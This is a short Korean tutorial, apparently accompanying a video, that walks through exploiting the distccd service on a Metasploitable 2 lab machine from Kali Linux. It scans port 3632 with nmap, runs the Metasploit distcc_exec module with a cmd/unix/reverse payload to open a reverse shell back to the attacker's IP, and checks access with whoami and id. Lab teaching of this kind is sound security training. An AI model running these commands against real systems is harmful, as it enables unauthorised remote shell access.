
이번 영상에서는 Metasploitable 2 시스템의 distccd 서비스에서 발생하는 취약점을 악용하여 Kali Linux를 통해 원격 셸(remote shell)을 획득하는 방법을 보여줍니다.
nmap -sV -p 3632 192.168.56.102
✅ 결과는 다음과 같습니다:
3632/tcp open distccd v1
👉 즉, distcc가 열려 있으며 악용할 수 있습니다.
msfconsole
use exploit/unix/misc/distcc_exec
show options
필요한 매개변수:
옵션 값 RHOSTS Metasploitable IP RPORT 3632 PAYLOAD cmd/unix/reverse
set RHOSTS 192.168.56.102
set PAYLOAD cmd/unix/reverse
set LHOST 192.168.56.101
LHOST — Kali Linux IP 주소
run
🎉 결과
성공하면:
[*] Command shell session opened
셸을 확인합니다:
whoami
uname -a
id